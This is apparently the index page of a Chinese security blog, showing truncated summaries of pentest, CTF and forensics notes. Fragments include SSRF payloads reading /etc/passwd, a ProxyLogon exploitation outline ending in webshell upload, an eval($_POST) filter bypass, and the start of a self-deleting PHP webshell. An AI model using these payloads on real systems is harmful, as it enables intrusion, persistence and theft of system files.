歇马

摘要： #下载环境 https://csilinux.com CSI Linux User:csi Passwd:csi 更新powerup Kali linux 开启forensic http://dftt.sourceforge.net/ #操作 ##Autopsy http://dftt.source 阅读全文

摘要： 参考链接http://pkiglobe.org/subject_alt_name.html When this SSL server certificate is presented to the browser and if the domain from where the certificat 阅读全文

该文被密码保护。 阅读全文

摘要： 偶然看到一篇介绍JARM工具的文章，用于识别TLS指纹，其中还可以用于Cobalt Strike识别。 #关于JARM ##工具介绍 一个TLS服务器指纹识别工具 https://codeload.github.com/salesforce/jarm/zip/refs/heads/master 通过 阅读全文

摘要： #背景 一张图片，DNS记录，包含4个IP地址 #DNS记录 A记录： 将域名指向一个IPv4地址（例如：100.100.100.100），需要增加A记录 CNAME记录： 如果将域名指向一个域名，实现与被指向域名相同的访问效果，需要增加CNAME记录。这个域名一般是主机服务商提供的一个域名 MX记 阅读全文

摘要： 记录一下断网的几种操作： 为什么要断网？ 中毒 防止横向移动 怎么做？ 拔网线 卸载网卡 /etc/modprobe.conf，删除alias eth1 XXXX /etc/sysconfig/networking/devices目录下，将ifcfg-eth1删除 /etc/sysconfig/ne 阅读全文

摘要： #协议 ##file协议 读取文件 file:///etc/passwd/ /etc/hosts 获取内网地址 /etc/network/interfaces 需要高权限 ##dict协议 探测端口 dict://127.0.0.1:6379 ##gopher 二次 URL 编码实现POST请求 # 阅读全文

摘要： #漏洞简介 CVE-2021-26855 SSRF CVE-2021-27065　任意文件上传 最终实现上传asp马 总的利用过程：SSRF获取SID->实现CVE-2021-27065文件上传 #CVE-2021-26855　POC请求分析 ##OWA ssrf GET /owa/auth/xxx 阅读全文

摘要： #通过dig获取 dig @xxx.xx.xx.x version.bind chaos txt 获取信息 ;; ANSWER SECTION: version.bind. 0 CH TXT "9.8.1" #通过Banner获取 #通过nslookup查询 nslookup -q=txt -cla 阅读全文

该文被密码保护。 阅读全文

摘要： #什么是Socket socket包含进行网络通信必须的五种信息：连接使用的协议，本地主机的IP地址，本地进程的协议端口，远地主机的IP地址，远地进程的协议端口。 创建socket连接时可以指定使用的传输层协议，socket可以支持TCP或UDP协议。 #什么是socket（AF_INET&SOCK 阅读全文

摘要： #背景 某YAPI使用的数据库存在未授权访问，在Mongodb中发现疑似账户和密码的信息，尝试新增管理员权限用户实现登录YAPI管理台。 #形式 加密字符串如下 $2b$10$Y2Fxxxxxn/uxxxx/TXxxxx 搜了一下 是bcrypt加密，这种加密算法一般用于nodejs中加密字符串是放 阅读全文

摘要： #背景 一个黑页 eval($_POST['xxx']) 其实扫备份文件是可以扫到的 但是做的时候没扫 直接做了 #尝试 存在部分关键词过滤，其中正常应该使用POST:a=system("ls"); 但此处;被过滤 发现可以使用?>，即a=system("ls") ?> ##尝试获取源码 先看下文件 阅读全文

该文被密码保护。 阅读全文

摘要： #Attack ##漏洞利用 文件上传 任意文件读取 ##webshell上传 不死马确实好用 <?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '3.php'; $code = '<?php if 阅读全文